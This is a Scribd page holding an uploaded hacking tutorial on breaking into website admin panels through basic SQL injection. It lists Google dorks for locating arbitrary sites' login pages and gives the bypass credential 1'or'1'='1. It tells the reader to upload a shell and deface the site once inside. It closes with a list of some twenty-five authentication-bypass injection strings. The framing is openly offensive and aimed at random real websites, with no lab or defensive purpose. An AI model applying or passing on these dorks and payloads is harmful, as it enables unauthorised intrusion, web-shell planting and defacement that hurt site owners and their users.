0% found this document useful (0 votes)
69 views

Sqlin

The document describes how to hack into website admin panels using basic SQL injection techniques. It provides Google dorks to find potential targets and shows SQL injection login credentials of '1'or'1'='1 to bypass authentication if the site is vulnerable.

Uploaded by

muna cliff
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
69 views

Sqlin

The document describes how to hack into website admin panels using basic SQL injection techniques. It provides Google dorks to find potential targets and shows SQL injection login credentials of '1'or'1'='1 to bypass authentication if the site is vulnerable.

Uploaded by

muna cliff
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

🏴‍☠️🏴‍☠️HACK WEBSITES ADMIN PANNEL USING BASIC SQL INJECTION 🏴‍☠️🏴‍☠️

☣️Website hacking with SQL Injections☣️

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing
post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very
basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites
admin panel using a simple google dork and a SQL query to bypass the admin user name and password
and enter into the panel. When you are in the panel just find a upload option and upload your shell,
then deface it.

Dorks: inurl:adminlogin.aspx

inurl:admin/index.php

inurl:administrator.php

inurl:administrator.asp

inurl:login.asp

inurl:login.aspx

inurl:login.php

inurl:admin/index.php

inurl:adminlogin.aspx

#TRY TO MAKE YOUR OWN DORKS FOR HIGH SUCCESS RATE

Hundreds of sites will open up having /adminlogin*.aspx in their URL. Select any website, you will get
the area from where the admins login. Fill the details as:

User: 1'or'1'='1
Password: 1'or'1'='1

Use the above mentioned login details and you will be into the admin panel of a website. I will not work
for all the websites you will find, but will work on most of the website.

🔆 Other injection queries;-

or 1=1 –

1'or’1'=’1

admin’–

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’='x

” or “x”=”x

‘) or (‘x’='x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’='a
“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’='a

hi’) or (‘a’='a

hi”) or (“a”=”)

You might also like